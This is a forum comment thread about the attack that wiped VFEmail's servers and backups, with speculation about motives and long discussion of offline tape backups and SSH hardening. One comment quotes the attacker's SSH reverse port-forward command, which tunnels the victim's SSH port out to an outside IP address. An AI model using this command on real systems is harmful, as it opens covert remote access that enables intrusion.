It's dead, Jim!
Jokes aside, one wonders why a ne'er-do-well would thoroughly trash a business to the point of no return...
A hacker wiped every server and backup of VFEmail this week in a "catastrophic" attack, according to the webmail service. VFEmail admins detailed the network intrusion on Monday in a grim red-letter update on the site's front page. The service's founder Rick Romero also said it's likely the webmail outfit is toast as a result …
they might have wanted to permanently yeet something that was on those servers
I agree - this looks like someone specifically wanted to destroy something specifically hosted by VFEmail. It may well have been simply the email archives of a single user, or a small number of users, and the attacker just wiped everything for simplicity and to disguise the true target.
It's interesting that the attacker apparently had multiple sets of credentials for the different servers; that suggests a sustained effort, with an initial phase of gathering vulnerabilities so the attacker could hit everything in a brief campaign.
"However, they might have wanted to permanently yeet something that was on those servers."
Wasn't that the main plot of a "Person Of Interest" episode a while back? Only those guys were in an emergency call centre and the bad guy was wiping the logs to delete a specific incoming call from the logs.
Interesting how Life imitates Art sometimes. Or, perhaps, could it be that Mr. HackyGuy's underlings got the idea from the programme?
I work in schools.
I can tell you the answer is most likely:
"Because they can". If not, then "For a laugh".
Same as why kids break each other's Chromebooks, pull the power from someone else's computer before the work has been saved, or turn on all the accessibility settings on the login menu so Windows starts talking to you as you move the mouse.
As an IT guy for schools, I'm much more interested in "how was this even possible".
"This takes planning, this takes will and this takes a motive. If you think the answer is "because they can" then you are incredibly naive."
I'm afraid you're the naive one. Last November, a charity in the area was collecting toys to give out to children of poor families (as they do every year). After two months of investigation they found the man who did it. His reason? He thought it would be funny to imagine all those children crying on Christmas Day. This wasn't religious, this wasn't "I'm poorer" - this was just an asshole.
Also, not so nearby, a small group of teenagers stole a Twingo, poured petrol on the back seat, set it alight and with the aid of a large rock sent it driving itself into a field of wheat just before harvest time. You can imagine how many fire engines needed to be dispatched in the middle of the night. It was easy to catch the teens: they were the ones bragging about how awesome it all was - setting several fields on fire, creating a major incident, badly hitting the livelihoods of two different farmers, nearly killing a few thousand pigs (thankfully saved by the farmer ploughing strips to act as a firebreak) and causing a number of homes to need to be evacuated (thankfully saved by the firemen). Yes, very awesome if you're the sort of dick that gets off on disaster porn.
It may well have been a hack by a state actor, ex employee, or somebody with something to hide, but it is also equally believable that this was just somebody with a bit of "skillz" doing it for the hell of it. Some people are just that fucked up.
Those are all examples with motive - actual motive. So this person will have a motive too.
"For the lolz" even has a reason behind the choice of target. Was it a group effort/doxing? If a child, why did they target this site and not another? It seems strange for a child or random attacker to have picked this site.
For example, a store here got smashed up. Seems like vandalism, right? Nothing got stolen? Nope - it was an attempted theft, with lots of damage in the process. So surface-level "there is no reason" reasoning is empty.
I'd put a lot of your school kids' problems down to lack of parenting, social dynamics (power play), lack of responsibility (not their Chromebook, IT can fix it), etc. Systemic failings of your school, and the general bullying too.
As someone has already pointed out, these examples have a motive. Not only that, but it's a massive difference between setting fire to stuff and hacking an enterprise. Any idiot can start a fire.
Seriously, people. I'm glad none of you are investigators or security consultants. This is supposed to be a techy forum - any chance you want to get your collective heads out of your collective asses? I'm not saying it's a state actor or a massive conspiracy; it could just be a disgruntled employee. Saying someone did it for the lols is just embarrassing.
I think you're all forgetting:
Computer viruses were around - and very destructive, just like this incident - for decades before they started being used to make money. People, skilled people, were writing programs and deliberately spreading them for no other reason than to destroy other people's data "because", profiting literally nothing from it at all, and unleashing them on the world rather than confining them to one person's computer.
The motive can be simply "To prove I can". "To show them they don't have security". Or even "Because then they'll hopefully buck their ideas up".
Look at any proof-of-concept code for a recent hack and you'll find people trading it online with their own twist, and they will have a cadre of "budding" virus-writers describing how they used it "for lolz" just to try to gain reputation.
There are people in this world who will happily call in SWAT teams, waste the emergency services' time (e.g. calling out fire brigades just to throw stones at them when they arrive) or - as one kid did in my road many years ago - pull down their pants, crap in their hand, and smear it over the only phonebox.
There doesn't need to be a motive, if you're only doing it "for a laugh". And it doesn't need to be for a serious purpose for someone to plan such things.
You'll probably find that someone ran an automated tool (or even bought an automated cloud-based hacking service! They exist!), it got them a shell on a remote system they knew nothing about, and then they went on IRC and asked "What should I run?", someone copy/pasted a line to blank the hard drives, and they all had a good laugh.
Again - their motivation is neither here nor there... it could be a targeted internal attack, an external random automated script, a slip of a finger by an authorised admin, or some kids playing games... it literally does not matter. What matters is that it should not be possible. Which is why - rather than rely on "detecting" whether the kids do these things, or working out their attacker's motive - it's also better, and necessary, to just make sure they aren't possible in the first place.
why a ne'er-do-well would thoroughly trash a business to the point of no return...
It looks like an action commissioned by a competitor. Actually, it's not so difficult to imagine something like this happening; if all their backups really are gone, their mistake was not keeping some backups offline.
Yes, they should have. However, it doesn't sound as if they had terrible security elsewhere, as they commented that the VMs had different authentication and different setups, so this attack (hopefully) couldn't have been done with a single compromised set of credentials. Still, if things are that large, they should have some place where email data was stored on offline - and ideally also offsite - media.
What does the VMs' authentication matter when you wipe the images from the hypervisor?
Also, as mentioned above, no pity: a backup server isn't a backup, it's a hot copy at best. You want three physical locations and an offline copy to boot. None of which may be much use against an ex-employee who's pissed.
Yes, they should have. However, it doesn't sound as if they had terrible security elsewhere, as they commented that the VMs had different authentication and different setups
They got hacked and had all of their data wiped; their security was inadequate to the point of being fair to describe it as "terrible".
Security is more an outcome than a process. Ticking every box and passing an audit but getting hit by something like this fails the ultimate audit called "real life".
If _I_ were running an email hosting service, _I_ would periodically hook up a tape drive, back up everything to tape, and remove the tape. In fact, I'd use different sets of tapes for different days of the week, so that if malware got in I'd have time to detect the problem before all the backups were contaminated. It's hard to erase tapes which are not even in the tape drive. It's even harder to do it multiple times because I have multiple sets of tapes. Backing up to tape means that the latest mail won't be backed up, but it would be a whole lot better to be out a few hours or even a few days of mail than to be out of _all_ mail.
For those who don't like tape, back up to a _removable_ drive... and remove it once the backup is completed. Again, have at least one removable drive per day per mail server, and physically remove the drive when the backup is done. All of my backups at work are to tape, with a nice 5TB removable drive covering the important stuff as well. Tape is slow, old-fashioned... and works. Hipsters and millennials will pry my LTO tape drives out of my cold dead hands.
It sounds as if all backups were live, online, backups, so that the backups were killed at the same time as the main systems were killed. This means that, effectively, there were no backups. They're fucked.
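The weekday rotation described above can be sketched in a few lines of shell. This is a hedged illustration, not VFEmail's (or the poster's) setup: the device path, directory list, and tape labels are all my assumptions.

```shell
#!/bin/sh
# Hypothetical weekday tape rotation: one tape (or removable drive) set
# per day of the week, ejected after writing so later malware can't
# reach it. TAPE_DEV and BACKUP_DIRS are illustrative placeholders.
TAPE_DEV=${TAPE_DEV:-/dev/nst0}
BACKUP_DIRS=${BACKUP_DIRS:-/var/mail /etc}

tape_label() {
    # Which tape set should be in the drive for a given weekday.
    echo "mailbackup-$1"
}

run_backup() {
    day=$(date +%a)                       # e.g. "Mon"
    echo "Load tape $(tape_label "$day"), then press Enter" >&2
    tar -cf "$TAPE_DEV" $BACKUP_DIRS      # one full dump to tape
    mt -f "$TAPE_DEV" offline             # eject: offline means offline
}
```

With five or seven independent sets, malware has to stay undetected for a full cycle before every copy is contaminated - which is exactly the breathing room the poster is describing.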
First you buy a lot of tape. Then you back up each server to its own tape. Every so often you pull a complete set of tapes off the tape carousel and restore them to a test VM to make sure that you have a working backup. It’s expensive, and tedious, and a full-time job, but if it isn’t done you end up with this mess.
LTO-8 holds 12TB per tape natively (up to 30TB compressed), so not that many tapes, even if they are a hundred bucks a pop.
The real cost, I think, would be in paying people on site to physically secure those tapes off-site. I suspect that's why VFEmail didn't have off-site physical backups; it was a relatively small operation, with servers in datacenters on multiple continents, and probably didn't have the budget to pay people to physically load blank tapes and put filled ones in storage.
It's feasible for a handful of administrators to run lots of virtual servers in datacenters around the world. It's considerably more expensive as soon as on-site human labor gets involved.
And running those sorts of backups remotely probably wouldn't have been feasible either, due to latency and bandwidth constraints.
That doesn't mean data like this shouldn't have off-site physical backups, of course. I just think the economics are difficult. How much more can you charge your customers to cover those backups without having an unsustainable fraction of them switch to competing services? Users historically have not shown much willingness to pay extra for security.
"How do you backup 100's of terabytes and live VM's?"
Answer: Any way you can, as long as it works !!!
Live backups are nice but if they are 'on-line' they are *not* 100% safe ..... as learnt !!!
You must at some point have a definition of the 'worst case' minimum data set you need to recover from *and* it must be safe from all possible dangers by design.
If your customers know in advance that definition, and are happy with it you can survive.
You then, by whatever means & costs, ensure that you can create a *safe* copy of the 'worst case' minimum data set per day/week/month (whatever your definition requires).
There are many methods to do the above, unfortunately most/all of them are expensive.
This is the 'real' cost of providing services such as e-mail etc.
I am truly sorry for the 'hit' & consequent loss of the business ..... even more so for the paying customers.
This is a failure to anticipate *all* possible modes of data loss and be prepared to handle it.
If 'on-line' then 'hacking' is one of those possible modes !!!
This is exactly why having data off-site/off-line is *so* important !!!
Only the likes of Google/Apple/Microsoft etc can afford to have *all* their data on-line because they probably have multiple copies in multiple places (in real time) behind major security systems that work !!!
Live VMs typically need config files and daily data snapshots copied to "something", and that's about it. If they break you just re-build them, restore the data, and move on.
And who said it was 100's of TERABYTES anyway? I would expect commercial solutions to already exist, even if it WERE 100's of terabytes.
lots of info out there about replication and using one of the mirrors to do your backups, re-sync after, periodically storing backups in an off-site archive of some kind. Also cloud backups. And so on.
How do you backup 100's of terabytes and live VM's?
Properly. As for "live" - that's why storage facilities generally have a snapshot capability. You accept that you have a gap between backups - how large it is depends on your backup frequency - but what you cannot afford is NOT having a proper backup. QED.
By the way, backup is what makes reliable storage so expensive. If it's cheap, it's an easy guess to assume that corners have been cut in the area of backup - be wary of that.
There are many enterprises that do this every day without fail.
NetBackup will take a live VM image and back it up to disk or tape targets. Veeam does the same thing. I'm sure that Commvault will too...
100's of TB is small fry - the last tape-based system I specified and built was running multi-petabyte backups. You back up to disk, then stage that to tape. It's really not rocket science.
Commvault will cheerfully do a live VM image and backup, both full backup and incremental. If the underlying storage supports it, they have a feature called "Intellisnap" that leverages the storage's snapshot feature to take the image, although it's slightly more convoluted.
(I don't work for commvault, but I do use their product at my company.)
As for size: yeah, disk to disk, then secondary copy (aux. copy in commvault's parlance) to tape.
Amen to prying LTO out of my cold dead hands. Yes, they are pricey at the SMB level, and getting Backup Exec to play nice is always a fun game, but the cartridges are cheap enough to keep full backups permanently every week/month for both DR and compliance.
That, and I've never had trouble getting a customer that has previously lost data to budget for one to do them properly.
At that scale, robotic tape libraries may get out of hand cost-wise, but geeze, some kind of offline backup, people! Imagine if they'd been Cryptolocker'd on their own network - did this scenario never occur to them?
And there was me feeling slightly old-skool buying an LTO drive and a box of tapes back in December to backup my Veeam online backup. As an SMB, it's a cheap, efficient solution to getting offline backups that are air-gapped from NotPetya and this sort of thing and it gives the junior a nice boring task each day. Re the remark about Backup Exec - I feel your pain; Veeam handles tape jobs beautifully (it's effectively just copying the online one to the tape) in comparison and it was a snap to set up.
Funnily enough, it took a bit of explanation to the various suppliers I contacted that yes, I really did want tape, and no, I didn't see the value in spending the same as it eventually cost each month to have another online copy in a DC somewhere.
That, and I've never had trouble getting a customer that has previously lost data to budget for one to do them properly.
Over the years, with various hats on (variously in house and providing services to clients) there's always been the notion that the easiest time to sell backup to [the client|manglement] is when lack of a proper backup has caused data loss. At my last job I did my best with the budget allowed to me (zero, just what I could scavenge as other stuff got upgraded) - I had rolling multi-copy backups but was never happy that while they were on separate disks, they were in the same box as one of the VM hosts. Unfortunately I never managed to scrape together the hardware to replicate the backups to another site I had available to me - and even then it would have left us open to this sort of thing.
But it does look like it was a really deliberate job if the criminals (let's call them what they are) were able to compromise a range of systems with different authentications.
Good points about tape but you missed the important one: Test your backups. Having a tape is no good if you can't restore it after your system has been hacked/burnt/stolen/confiscated/mislaid. Also no good if the tapes are worn out because you cycle around the same five daily backup tapes for 5 years.
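A trivial restore drill along those lines, as a sketch (paths are invented; with real tape you'd read back from the drive rather than a temp file): archive, restore into a scratch directory, and compare byte-for-byte.

```shell
#!/bin/sh
# Minimal backup-and-verify drill: make an archive, do a trial restore
# into a scratch directory, and compare the data byte-for-byte. This is
# the step that catches unreadable media *before* you need it.
SRC=$(mktemp -d)
RESTORE=$(mktemp -d)
ARCHIVE=$(mktemp)
echo "important mail" > "$SRC/inbox"

tar -C "$SRC" -cf "$ARCHIVE" .        # the "backup"
tar -C "$RESTORE" -xf "$ARCHIVE"      # the trial restore

# A backup you haven't restored is a hope, not a backup.
cmp -s "$SRC/inbox" "$RESTORE/inbox" && echo "restore OK"
```

Scale the same idea up: periodically pull a full tape set and restore it to a test VM, as another commenter here suggests.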
Anything important to me - I back it up myself.
Early in my career, I was working at IBM and had a PC RT (IBM's first commercial UNIX workstation) running AOS 4.3 (IBM's BSD port for the RT). The machine had a pair of 40MB drives.
Someone found a 70MB drive in one of our Rooms Of Discarded Stuff. (I was at IBM's Kendall Square building, which also hosted the Cambridge Scientific Center, so the site was full of weird experimental hardware and random used bits and pieces, stashed willy-nilly in unused offices.) So I figured I'd give myself a 30MB upgrade. I was going to take the machine down to put in a faster CPU daughterboard anyway.
Since I was going to repartition, I backed all my stuff up to QIC tape. Then I shut the machine down, swapped the 70MB drive in for one of the 40MB ones, booted to the AOS install tape, partitioned the drives, installed the OS, and went to install from my backup tapes.
The backup tapes were unreadable. I don't know why; they were reused and may have been too old, or I may have messed up with my mt and tar command lines; or there might have been something wrong with the tape drive. (It read the OS install tapes, but like an idiot I hadn't tried writing a tape and reading it back.)
All my actual work for IBM was in source code control on the AFS network filesystem, of course. Even at that age I wasn't a complete idiot. I always operated on the assumption that my workstation might die at any moment, and the work I was paid to do had damn well better be preserved somewhere else. And some personal stuff I really cared about had been backed up to floppies or whatnot. But I lost a bunch of personal projects I was goofing around with after hours, like my personal X11 window manager.
It was a painful lesson - I probably spent half a day trying to get those damn tapes read. But eventually I accepted it.
(Then, years later, I had a laptop hard drive suffer catastrophic controller failure while I was in the process of backing it up. All I lost that time was a few days' worth of emails, because I was pretty vigilant about keeping stuff backed up. And checking those backups.)
"Also no good if the tapes are worn out because you cycle around the same five daily backup tapes for 5 years."
Some years ago, I got a call from one of my clients to go and visit one of their satellite offices to check up on their backups. The non-techy person in charge of the tapes had been correctly following the instructions: place the correct tape in the drive before leaving each day, then remove the ejected tape and put it on the shelf. Except a backup hadn't even started for over 6 months, because the tapes had expired and were being ejected as soon as the 8pm backup process started.
I can't remember why they asked me to go in the first place or how they found out there might be a problem, but the upshot was they suddenly decided it would be a good idea to use the backup app's ability to email a status report to head office after each run. I heard later they sent a full new set of tapes to every satellite office, because none of them had been completing for many months.
Note, this was an insurance company, many years ago, when DOS clients and Netware servers were still all the rage.
Good points about tape but you missed the important one: Test your backups. Having a tape is no good if you can't restore it after your system has been hacked/burnt/stolen/confiscated/mislaid. Also no good if the tapes are worn out because you cycle around the same five daily backup tapes for 5 years.
THIS TIMES INFINITY AND BEYOND!!!!
We have both a near-time replication of critical apps to DR, daily/weekly disk to disk backups, and monthly copy to tape, and limit the number of write cycles on the tape. Commvault is smart enough to flag a tape as bad if it gets too many errors on it, and it will also deprecate a tape and refuse to write to it after a certain number of cycles. (your backup application may or may not operate in a similar manner.)
Ah yes. So I'm not the only one. I still believe backup tapes have their place.
I got interested in backups in the NHS when I saw their solution years ago, then adopted it at home - though not on tape, as I couldn't afford the setup.
Anyway.
Monday full backup
Tues to Thursday incremental backup
Friday full week 1 backup.
Rinse and repeat for 3 weeks.
Then on the 4th Friday of the month it becomes
Month 1 backup
Rinse and repeat for 3 months, so you always have 3 months of offline backups stored in a fireproof safe - either offsite, or onsite but in another fire zone, which can end up being another location in the same building or another building onsite.
All on tape.
Worked well.
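That grandfather-father-son schedule can be sketched as a tape-picking function (labels are made up for illustration; this isn't the NHS's actual tooling):

```shell
#!/bin/sh
# Sketch of the rotation above: given the weekday and the week-of-month,
# name the offline tape to load. Labels are invented for illustration.
tape_for() {
    day=$1; week=$2
    case "$day" in
        Mon)           echo "mon-full" ;;
        Tue|Wed|Thu)   echo "incr-$day" ;;
        Fri)
            if [ "$week" -eq 4 ]; then
                echo "month-full"      # 4th Friday becomes the month tape
            else
                echo "week$week-full"
            fi ;;
        *)             echo "no-backup" ;;
    esac
}
```

The point of the scheme is that the monthly tapes age out slowly, so even a compromise that sits undetected for weeks leaves you something to restore.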
I find that explanation lacking. "backup server" does not imply backed up data. If a network backup system, for example Bacula, is being used, then backup servers are the nodes (or VMs) that are running the network backup app, implying that they temporarily have no way to access the backed up data, but not that the backed up data, off-site or not, doesn't exist. Or "backup servers" could mean passive failover nodes (or VMs) in a high availability cluster. Very misleading terminology. So what exactly is/was a "backup server" at VFEmail?
"Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it."
One could also draw the conclusion that since someone cared enough to thoroughly nuke the whole thing - ransom be damned - then it was certainly doing a good job at some level (though not the security/backups level, presumably).
But then, other people just want to watch the world burn.
...how an external hacker, without any contact (accomplice) in the company, could totally wipe all production servers and all backup servers in one go without ever being detected?
Okay, forget the detection part - the IT admins could be clueless - but that does not go with the fact that they had different credentials for different servers. They were at least doing something right.
And why go and nuke everything if you're just a hacker? That's not going to make you any money.
This smells very strongly of an inside job. Done by a state-level actor or not, this is not some group out of Sevastopol just having some fun.
And why go and nuke everything if you're just a hacker? That's not going to make you any money.
Unless someone was paid to push the customers to the competition.
This smells very strongly of an inside job.
This is possible. Sysadmins could be bribed, especially if they are paid as much as Asian undergraduates.
Done by a state-level actor or not,
The corporate world, with its history of unfair competition, seems more likely to be interested than a state actor. So I think a private actor is much more likely.
this is not some group out of Sevastopol just having some fun.
Groups out of Sevastopol are, most of the time, paid in dollars, not rubles.
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N
Nice SSH reverse port forward. So essentially something already on the inside opened the door wide for this 'aktv', allowing them into either an IP-firewalled SSH service or a dedicated one.
Either way, that looks a lot like an inside job.
Ack on the 'launch the hack from there' - I figured the Tor network at the very least, or one of the dozens of computers already engaged in dictionary attacks against ssh.
A couple of defenses against that, worth mentioning:
a) disallow root logins
b) only enable specific users [that have guest-level access] and require 'su' to root to do "anything"
c) forget passwords, certs only
d) use things like 'fail2ban' to reduce the total number of attempts, and keep a log [of sorts] of those who attempt to crack your ssh
this assumes you NEED SSH in the first place (otherwise, shut it off from teh intarwebs)
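Points (a)-(c) map onto a few sshd_config lines. This is a hedged sketch, not a complete hardening guide - check sshd_config(5) for your OpenSSH version, and the usernames are placeholders:

```
# /etc/ssh/sshd_config (excerpt)
PermitRootLogin no              # (a) no direct root logins
AllowUsers alice bob            # (b) only named, unprivileged accounts
PasswordAuthentication no       # (c) keys/certs only, no passwords
PubkeyAuthentication yes
```

Point (d) is separate: fail2ban watches the auth log and bans repeat offenders at the firewall, which cuts the noise from those dictionary attacks right down.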
Iron Mountain isn't even that good; they lose shit constantly. Also, from a continuity perspective, they may be among the first but it's more a gimmick than actual competency. The mine they initially used wouldn't have survived a nuclear attack, or even all that strong of a conventional attack with WWII-era weapons, nor would the facility in Massachusetts that they like to hype up. Sure, OPM leases another hole near that one, but it's telling that they don't keep their records for NSPD 51/HSPD 22 compliance there. It's just the retirement record archives that NARA doesn't maintain.
The old school Federal Regional Centers like in Thomasville, Bothell, and Denton have their uses as does all the "empty" floor space at Site R and High Point and the various other places like Ukiah, Kauai, the AT&T Project Offices, and (especially) the other parts of the continuity belt in West Virginia. In other words, just because you have a large company running marketing based on their supposed credentials and experience, there are far better ones out there, some of whom you probably wouldn't expect.
Just two and a half cents from someone working in this field.
I clear out the filters on our mail server every day... we're not a big company, but recently I've seen increasing login attempts - every couple of seconds someone somewhere in the world attempts to log in - and we've been getting a lot more virus and trojan deliveries since the start of the year.
Who is to say the hackers did not make a copy of all the current mail on the system? In which case it is also a breach of personal information.
And since they are marketing their services to customers in the EU then it would also be a breach under GDPR....
Tits-up and fined. OK, it probably couldn't be worse. Unless disgruntled people come and start doing nasty things to your bits in revenge for losing theirs. That would be worse. Given the week they're having, perhaps they should consider Outer Mongolian yak herding as a new business model.